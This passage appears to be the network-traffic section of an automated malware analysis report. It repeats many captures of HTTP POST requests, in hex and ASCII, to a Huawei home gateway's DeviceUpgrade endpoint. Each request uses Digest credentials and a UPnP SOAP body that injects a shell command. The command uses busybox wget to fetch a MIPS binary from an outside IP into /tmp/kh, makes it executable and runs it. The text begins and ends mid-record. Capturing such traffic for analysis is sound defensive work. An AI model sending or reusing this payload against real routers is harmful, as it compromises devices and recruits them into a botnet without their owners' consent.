6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POSTData Raw: Data Ascii:
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox 